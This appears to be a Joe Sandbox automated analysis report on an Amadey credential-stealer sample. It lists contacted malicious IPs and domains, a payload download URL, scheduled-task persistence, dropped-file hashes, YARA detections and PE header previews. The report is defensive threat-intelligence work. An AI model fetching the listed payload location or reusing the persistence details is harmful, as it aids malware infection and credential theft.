                                              unknownUnited Kingdom
                                              30798TNNET-ASTNNetOyMainnetworkFItrue
                                              185.98.131.207
                                              kikangalaassociates.comFrance
                                              16347RMI-FITECHFRtrue
                                              IP
                                              192.168.2.1
                                              192.168.2.3
                                              Joe Sandbox Version:36.0.0 Rainbow Opal
                                              Analysis ID:766457
                                              Start date and time:2022-12-13 20:06:50 +01:00
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 15m 39s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Sample file name:kmxId0uLRn.exe
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed:46
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.phis.troj.spyw.evad.winEXE@51/18@28/6
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HDC Information:
                                              • Successful, ratio: 60.2% (good quality ratio 54.3%)
                                              • Quality average: 71.8%
                                              • Quality standard deviation: 32.3%
                                              HCA Information:
                                              • Successful, ratio: 93%
                                              • Number of executed functions: 61
                                              • Number of non-executed functions: 96
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Override analysis time to 240s for rundll32
                                              • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WerFault.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 20.42.73.29
                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, watson.telemetry.microsoft.com
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size exceeded maximum capacity and may have missing network information.
                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                              TimeTypeDescription
                                              20:08:51Task SchedulerRun new task: Firefox Default Browser Agent 4D11EF12B087A959 path: C:\Users\user\AppData\Roaming\thgcici
                                              20:09:07Task SchedulerRun new task: gntuud.exe path: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe
                                              20:09:07API Interceptor1283x Sleep call for process: explorer.exe modified
                                              20:09:07API Interceptor1401x Sleep call for process: gntuud.exe modified
                                              20:09:15API Interceptor1x Sleep call for process: WerFault.exe modified
                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              31.41.244.228file.exeGet hashmaliciousBrowse
                                              • 31.41.244.228/fusa/bibar.exe
                                              185.246.221.151file.exeGet hashmaliciousBrowse
                                              • r3oidsofsios.com/
                                              file.exeGet hashmaliciousBrowse
                                              • r3oidsofsios.com/
                                              lHm6z75BEL.exeGet hashmaliciousBrowse
                                              • r3oidsofsios.com/
                                              file.exeGet hashmaliciousBrowse
                                              • r3oidsofsios.com/
                                              file.exeGet hashmaliciousBrowse
                                              • r3oidsofsios.com/
                                              file.exeGet hashmaliciousBrowse
                                              • r3oidsofsios.com/
                                              G6BLxYuvUq.exeGet hashmaliciousBrowse
                                              • r3oidsofsios.com/
                                              FGBX7XkY6M.exeGet hashmaliciousBrowse
                                              • r3oidsofsios.com/
                                              ayy8sj4Csb.exeGet hashmaliciousBrowse
                                              • r3oidsofsios.com/
                                              file.exeGet hashmaliciousBrowse
                                              • r3oidsofsios.com/
                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              r3oidsofsios.comfile.exeGet hashmaliciousBrowse
                                              • 185.246.221.151
                                              file.exeGet hashmaliciousBrowse
                                              • 185.246.221.151
                                              lHm6z75BEL.exeGet hashmaliciousBrowse
                                              • 185.246.221.151
                                              file.exeGet hashmaliciousBrowse
                                              • 185.246.221.151
                                              f1642b45acfb9014b62e9fd1e99bab115dd88fdcd92de.exeGet hashmaliciousBrowse
                                              • 185.246.221.151
                                              J2w2iaakUk.exeGet hashmaliciousBrowse
                                              • 185.246.221.151
                                              file.exeGet hashmaliciousBrowse
                                              • 185.246.221.151
                                              g27m3GfEK7.exeGet hashmaliciousBrowse
                                              • 185.246.221.151
                                              XnR6h4yoIb.exeGet hashmaliciousBrowse
                                              • 185.246.221.151
                                              Slhu8FAVqd.exeGet hashmaliciousBrowse
                                              • 185.246.221.151
                                              file.exeGet hashmaliciousBrowse
                                              • 185.246.221.151
                                              SjmPogOx2m.exeGet hashmaliciousBrowse
                                              • 185.246.221.151
                                              az7Zp04bC8.exeGet hashmaliciousBrowse
                                              • 185.246.221.151
                                              A17Wr8OqIJ.exeGet hashmaliciousBrowse
                                              • 185.246.221.151
                                              NEDS3XKDq6.exeGet hashmaliciousBrowse
                                              • 185.246.221.151
                                              file.exeGet hashmaliciousBrowse
                                              • 185.246.221.151
                                              N8gP27Xs4q.exeGet hashmaliciousBrowse
                                              • 185.246.221.151
                                              bT0YYJE1rQ.exeGet hashmaliciousBrowse
                                              • 185.246.221.151
                                              file.exeGet hashmaliciousBrowse
                                              • 185.246.221.151
                                              XJXuWlR8TZ.exeGet hashmaliciousBrowse
                                              • 185.246.221.151
                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              LVLT-10753USfile.exeGet hashmaliciousBrowse
                                              • 185.246.221.151
                                              SecuriteInfo.com.Win32.DropperX-gen.17031.18134.exeGet hashmaliciousBrowse
                                              • 185.246.220.210
                                              Reftt1213202254.exeGet hashmaliciousBrowse
                                              • 185.246.220.210
                                              SecuriteInfo.com.Win32.PWSX-gen.23551.28307.exeGet hashmaliciousBrowse
                                              • 185.246.220.210
                                              SecuriteInfo.com.Win32.DropperX-gen.27720.5482.exeGet hashmaliciousBrowse
                                              • 37.139.129.71
                                              1808.PDF.exeGet hashmaliciousBrowse
                                              • 194.180.48.210
                                              Reftt121220225522.exeGet hashmaliciousBrowse
                                              • 185.246.220.210
                                              file.exeGet hashmaliciousBrowse
                                              • 185.246.221.151
                                              INV.-OUTSTANDING-PAYMENT.jsGet hashmaliciousBrowse
                                              • 37.139.128.51
                                              SecuriteInfo.com.Win32.CrypterX-gen.27190.13069.exeGet hashmaliciousBrowse
                                              • 185.246.220.210
                                              cC6yefr524.exeGet hashmaliciousBrowse
                                              • 37.139.129.107
                                              Bl Draft.exeGet hashmaliciousBrowse
                                              • 185.246.220.39
                                              DOC_1213.EXE.exeGet hashmaliciousBrowse
                                              • 194.180.48.184
                                              Betalingsraadgivning.exeGet hashmaliciousBrowse
                                              • 194.180.48.210
                                              File-919-12-12-22.exeGet hashmaliciousBrowse
                                              • 194.180.48.184
                                              3M5zLUqPrc.batGet hashmaliciousBrowse
                                              • 185.246.220.123
                                              SecuriteInfo.com.IL.Trojan.MSILZilla.23472.27512.3827.exeGet hashmaliciousBrowse
                                              • 185.246.220.210
                                              SecuriteInfo.com.Win32.CrypterX-gen.10360.12173.exeGet hashmaliciousBrowse
                                              • 185.246.220.210
                                              1cKhrGY6Ll.exeGet hashmaliciousBrowse
                                              • 185.246.220.218
                                              9xfmAn7tia.exeGet hashmaliciousBrowse
                                              • 194.180.48.197
                                              AEROEXPRESS-ASRUfile.exeGet hashmaliciousBrowse
                                              • 31.41.244.228
                                              file.exeGet hashmaliciousBrowse
                                              • 31.41.244.100
                                              mAANFmhPdB.exeGet hashmaliciousBrowse
                                              • 31.41.244.186
                                              YnfhpgBZTZ.exeGet hashmaliciousBrowse
                                              • 31.41.244.186
                                              SecuriteInfo.com.Variant.Marsilia.1985.2254.20250.exeGet hashmaliciousBrowse
                                              • 31.41.244.100
                                              xPbswye1kO.exeGet hashmaliciousBrowse
                                              • 31.41.244.186
                                              y8I2mGWc0a.exeGet hashmaliciousBrowse
                                              • 31.41.244.237
                                              OWvqwladJU.exeGet hashmaliciousBrowse
                                              • 31.41.244.186
                                              file.exeGet hashmaliciousBrowse
                                              • 31.41.244.237
                                              file.exeGet hashmaliciousBrowse
                                              • 31.41.244.237
                                              file.exeGet hashmaliciousBrowse
                                              • 31.41.244.237
                                              file.exeGet hashmaliciousBrowse
                                              • 31.41.244.237
                                              file.exeGet hashmaliciousBrowse
                                              • 31.41.244.237
                                              file.exeGet hashmaliciousBrowse
                                              • 31.41.244.237
                                              file.exeGet hashmaliciousBrowse
                                              • 31.41.244.237
                                              file.exeGet hashmaliciousBrowse
                                              • 31.41.244.237
                                              file.exeGet hashmaliciousBrowse
                                              • 31.41.244.237
                                              file.exeGet hashmaliciousBrowse
                                              • 31.41.244.237
                                              file.exeGet hashmaliciousBrowse
                                              • 31.41.244.237
                                              file.exeGet hashmaliciousBrowse
                                              • 31.41.244.237
                                              No context
                                              No context
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):0.6772632143876667
                                              Encrypted:false
                                              SSDEEP:96:Yl7FpFaefLzFhBX7kRC6tpXIQcQvc6QcEDMcw3Db+HbHg/8BRTf3OyWZAXGng5FA:YRjFaUsHBUZMXYjuq/u7sqS274ItL7
                                              MD5:3B1C322E839ACACBA456FEDD9F393D9E
                                              SHA1:1901D98FC6CC533884C755A93835ACD0B683EE47
                                              SHA-256:D21A2F3BDE2CDB1E09E849A1953EAB93FC493182E98400C910AED2C54FD563B8
                                              SHA-512:5C9335AE5292820E5E5B73C28C869B3B9134080D2E2CAA2368816A02B46C21C1BE0D2FA43C713ED610AF1A34376B3C2415E9B376FEDD1217E670EE0A32EA667C
                                              Malicious:false
                                              Reputation:unknown
                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.5.4.6.4.5.4.4.2.9.1.1.0.1.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.5.4.6.4.5.4.6.7.9.1.0.9.3.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.3.0.8.9.e.4.6.-.b.1.6.0.-.4.1.a.6.-.9.8.3.4.-.b.5.2.2.1.c.e.d.e.6.a.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.4.4.5.c.e.2.e.-.2.c.5.d.-.4.8.0.4.-.b.4.a.f.-.f.d.0.5.1.0.0.b.e.d.c.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.8.F.6.8...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.2.0.-.0.0.0.1.-.0.0.1.f.-.5.c.7.5.-.7.c.c.8.7.1.0.f.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.3.f.0.1.9.6.9.b.2.7.5.4.4.4.2.2.2.3.b.5.1.b.f.7.8.e.5.d.4.4.6.0.0.0.0.f.f.f.f.!.0.0.0.0.8.e.b.0.c.7.d.0.2.f.c.8.a.a.6.b.6.c.5.a.7.c.7.1.e.a.6.0.b.c.3.3.3.a.a.3.d.1.c.7.!.8.F.6.8...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.1.2././.1.3.:.
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Mini DuMP crash report, 14 streams, Wed Dec 14 04:09:04 2022, 0x1205a4 type
                                              Category:dropped
                                              Size (bytes):34894
                                              Entropy (8bit):2.098097190395399
                                              Encrypted:false
                                              SSDEEP:192:u2A9k2HFvOth7eZ1S6SRlmaRANO/4a08SdRLOEn:uZIthKD+4alMLOE
                                              MD5:57BB9A19DFFC3A30720BD4BC392CE63C
                                              SHA1:2841C2A5A4CA55248BAA12B03DDF45BF9A5E8080
                                              SHA-256:3B979F47F4E4CE93C4274A6ECB56FDD788156D662386482A1F7EB013B8A242B7
                                              SHA-512:27DADBE48BFE5F551A66C6A4B043ED16E33DB3272945BC36066DA3C0E54B32B393E9C0414A95DAAA8F5AF2234F02FE2539B51A9E71620F88A108659B68FB5ED2
                                              Malicious:false
                                              Reputation:unknown
                                              Preview:MDMP....... .......`L.c....................................$...............T.......8...........T...............v}...........................................................................................U...........B......4.......GenuineIntelW...........T....... ...WL.c............................. ..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):8332
                                              Entropy (8bit):3.6908615623175716
                                              Encrypted:false
                                              SSDEEP:192:Rrl7r3GLNi7+6z6YqJSUfDJgmfESP2Cpr389b+6sfSF9Km:RrlsNiy6z6Y0SU7JgmfESe+Zf0
                                              MD5:8C75001433EBA8F2FC9FF9E7B4184A9F
                                              SHA1:93424EAB7389399AAD4E1A19658AABA8E57920DC
                                              SHA-256:CC6E0DAD83E7E690B1490D293A1F41A66650FC633E2D4F708C92EF1CC87AA0D4
                                              SHA-512:E31F4013818DC7E9A48D35C069F90F295DD71D7E800497646FB7C9986AF3520B8DA78BB13251CA12116964CC0116021E1B9EB109867E4692098695B4F117C5E6
                                              Malicious:false
                                              Reputation:unknown
                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.5.6.8.<./.P.i.d.>.......
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):4622
                                              Entropy (8bit):4.413835149815752
                                              Encrypted:false
                                              SSDEEP:48:cvIwSD8zseJgtWI951Wgc8sqYj88fm8M4JHMYUFgq+q8vYMYiGxMzjzOd:uITfUSEgrsqYFJHncKYnnxKvOd
                                              MD5:8DDA398B6D27443E0F36BC858939DB98
                                              SHA1:91A75DE7B4D7A847C5056214FA0AEA7BEF84C419
                                              SHA-256:0136FD997E5CD393648033FFD1BCC76C162A7D76F210793D86695378D1EFDC7D
                                              SHA-512:36ED0CF0B4F0B0F61A200A499F2F28EEBDDB7BC42A91CC8D6FBA9CF59C568F11B9C3BDEECECD357FAEDE69161FEE9C5D1FD919D7AE8DE72C5CB1E8491AB82964
                                              Malicious:false
                                              Reputation:unknown
                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1822399" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                              Process:C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):129024
                                              Entropy (8bit):6.511616263388435
                                              Encrypted:false
                                              SSDEEP:3072:ox7pOYzBekcmWDWCMq6As523HeS9FAiZ87vO2rlL3Rne9:ox7ZNhc/dMq6AO0a7vVlT
                                              MD5:9995ABF2F401E4945A7D2930A3727619
                                              SHA1:7715E14AD6E4ADF609C62C5812419800343FBD4F
                                              SHA-256:D35B5DD18D91DBFE3DC89CB75B6A26757777B5C52A33CD8FCF6E5ED45A946F1A
                                              SHA-512:42726FB602958594914B5BC936AFF36833823F9F9DA9BC80A46579D96CEC12C7DF070C174EC9DD82C21F2FE44F1E9A4A2E50D9944FEA6379DBDEC666727A7EDA
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, Author: Joe Security
                                              • Rule: INDICATOR_TOOL_PWS_Amady, Description: Detects password stealer DLL. Dropped by Amadey, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, Author: ditekSHen
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 79%
                                              Reputation:unknown
                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................X......x.............@..........................@..........................................O.......&.... ..............................................................................................................CODE................................ ..`DATA................................@...BSS......................................idata..&...........................@....edata..O...........................@..P.reloc..............................@..P.rsrc........ ......................@..P.............@......................@..P................................................................................................................................................................................
                                              Process:C:\Users\user\AppData\Local\Temp\9545.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):249344
                                              Entropy (8bit):6.371571449774557
                                              Encrypted:false
                                              SSDEEP:6144:90Tn/MUTehRBZbSjpwe6N+6LzXFuz5a6EKhK6Kr3ZpO:yXg7Zb46FLBuz5aD46zO
                                              MD5:C6524CC2CB091E23BE6D9526D6BCBC99
                                              SHA1:8A1FC0333392DCD9FF664F64CE88D7ABDFD882DC
                                              SHA-256:37DE71B43236C63687B44F238A17CDE5F16BEA2B2EC8C29B0EA42B62DE947D6D
                                              SHA-512:FA7CEE2EBC9A445830505C078DBD870D809E1F829B202E75A6CE7C8BB728CE7CC68D6980EE0989FD6EE9DEF2DAA0C4EB67D8A462EB4F8583B20760FFC8DF13C6
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe, Author: Joe Security
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 53%
                                              Reputation:unknown
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........XH..6...6...6...5...6...3.a.6...2...6.(.2...6.(.5...6.(.3...6...7...6...7.\.6.f.?...6.f.....6.f.4...6.Rich..6.........PE..L......c............................@.............@..........................0............@.....................................................................P)..._..p............................_..@...............\............................text...v........................... ..`.rdata..D...........................@..@.data...LD..........................@....rsrc...............................@..@.reloc..P).......*..................@..B................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe
                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                              Category:dropped
                                              Size (bytes):105976
                                              Entropy (8bit):7.9288617581895435
                                              Encrypted:false
                                              SSDEEP:1536:CYwlbiXP6ZT2fSPHA04D+fcBB0YugBbgaMiKmXaIjqZ73TCn1R73exu+jA9Ops8u:bwRiCpC+A04qcX0YfXVOxMtNFnSop
                                              MD5:AF9EDCF2AE7CA1F5DF3AB8FAEE735473
                                              SHA1:06218105DAA6BF86C04F0937C634E3C2C6B75A71
                                              SHA-256:02B2FE6FE005D6A31AABAC0E69BB44689B5F3918FBFB45A36BCE9E5838787FE8
                                              SHA-512:7F95A873B775494543F807A8CB0A4E29A0590235AC747D839EA3E0AB0322A8AC63E343040155999CFC7D9FF345456F4EF73CC84C650BDC4F825A75F160EF9227
                                              Malicious:false
                                              Reputation:unknown
                                              Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W......qco;.\..%r........H.'.|..)..m..e#..N.}5y._.pY\L.w[....r....%.......5...L..S....CN5b..6..>.... ZJ(......x+...4.../..[.#(b.NFs.Vu*F.y..*1rvG.K^.>._.?.....?.U..n...D>......g.a...F..U.#.h...>...Q...]...m...
                                              Process:C:\Windows\explorer.exe
                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):559616
                                              Entropy (8bit):7.300452125448157
                                              Encrypted:false
                                              SSDEEP:12288:9Q43DNbQ6lAwyJLiAM/K+M11HTbcxk48KAGoX81Ca:9lbByJLijK+M19N48KZv
                                              MD5:46F30465FA693033E7D3D78468406C0C
                                              SHA1:8EB0C7D02FC8AA6B6C5A7C71EA60BC333AA3D1C7
                                              SHA-256:3775F0AA5B9D87F0237FF1249F5E8548EBA54F23EABCF62C199564E0966662E4
                                              SHA-512:CF6680239B2D94E5D878E3902D9368B6B52675C1A8C0C780B4F5737BADA268A4A954C15655039364F68B6081DCFC325C103DB03EB49521438987C75D415B1F24
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:unknown
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;.cU..cU..cU...V..cU...P..cU...Q..cU...Q..cU...V..cU...T..cU..cT..cU...P..cU...\..cU......cU...W..cU.Rich.cU.................PE..L......c............... ."...r......It.......@....@.......................................@.....................................<...............................4... ...............................`...@............@..8............................text....!.......".................. ..`.rdata.......@.......&..............@..@.data...px... ...l..................@....rsrc................l..............@..@.reloc..4............n..............@..B........................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\explorer.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:modified
                                              Size (bytes):249344
                                              Entropy (8bit):6.371571449774557
                                              Encrypted:false
                                              SSDEEP:6144:90Tn/MUTehRBZbSjpwe6N+6LzXFuz5a6EKhK6Kr3ZpO:yXg7Zb46FLBuz5aD46zO
                                              MD5:C6524CC2CB091E23BE6D9526D6BCBC99
                                              SHA1:8A1FC0333392DCD9FF664F64CE88D7ABDFD882DC
                                              SHA-256:37DE71B43236C63687B44F238A17CDE5F16BEA2B2EC8C29B0EA42B62DE947D6D
                                              SHA-512:FA7CEE2EBC9A445830505C078DBD870D809E1F829B202E75A6CE7C8BB728CE7CC68D6980EE0989FD6EE9DEF2DAA0C4EB67D8A462EB4F8583B20760FFC8DF13C6
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\9545.exe, Author: Joe Security
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 53%
                                              Reputation:unknown
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........XH..6...6...6...5...6...3.a.6...2...6.(.2...6.(.5...6.(.3...6...7...6...7.\.6.f.?...6.f.....6.f.4...6.Rich..6.........PE..L......c............................@.............@..........................0............@.....................................................................P)..._..p............................_..@...............\............................text...v........................... ..`.rdata..D...........................@..@.data...LD..........................@....rsrc...............................@..@.reloc..P).......*..................@..B................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):129024
                                              Entropy (8bit):6.511616263388435
                                              Encrypted:false
                                              SSDEEP:3072:ox7pOYzBekcmWDWCMq6As523HeS9FAiZ87vO2rlL3Rne9:ox7ZNhc/dMq6AO0a7vVlT
                                              MD5:9995ABF2F401E4945A7D2930A3727619
                                              SHA1:7715E14AD6E4ADF609C62C5812419800343FBD4F
                                              SHA-256:D35B5DD18D91DBFE3DC89CB75B6A26757777B5C52A33CD8FCF6E5ED45A946F1A
                                              SHA-512:42726FB602958594914B5BC936AFF36833823F9F9DA9BC80A46579D96CEC12C7DF070C174EC9DD82C21F2FE44F1E9A4A2E50D9944FEA6379DBDEC666727A7EDA
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll, Author: Joe Security
                                              • Rule: INDICATOR_TOOL_PWS_Amady, Description: Detects password stealer DLL. Dropped by Amadey, Source: C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll, Author: ditekSHen
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 79%
                                              Reputation:unknown
                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................X......x.............@..........................@..........................................O.......&.... ..............................................................................................................CODE................................ ..`DATA................................@...BSS......................................idata..&...........................@....edata..O...........................@..P.reloc..............................@..P.rsrc........ ......................@..P.............@......................@..P................................................................................................................................................................................
                                              Process:C:\Windows\explorer.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):160970
                                              Entropy (8bit):7.998987236677346
                                              Encrypted:true
                                              SSDEEP:3072:ryKvP/FpzgLSFlw8Tsl0+NNr5+7Vp3NW21IrUu6d3O9dk5OaSZIVilFX4Kp46Afj:rXPLzCSLjTslhB5+7VgUu6MdaSZsAFXI
                                              MD5:12924AF0CE2C960BE50DE7A77879C2CC
                                              SHA1:83281053BE86A582D1A6591F1E596E437E32FCDE
                                              SHA-256:689BFCDCFF48E4EC3FF5660CC03913B6F45DA0622E8325EF3F3D75AFD2E343B0
                                              SHA-512:A7A0FCE274538DA72428D53CFEB593E2AE88ED0420E4D83E18FFF3561C41C9E5210AD9AC5AD27270473E6BD03F182D62218BFC5CB842937A5C554AB486DF4944
                                              Malicious:false
                                              Reputation:unknown
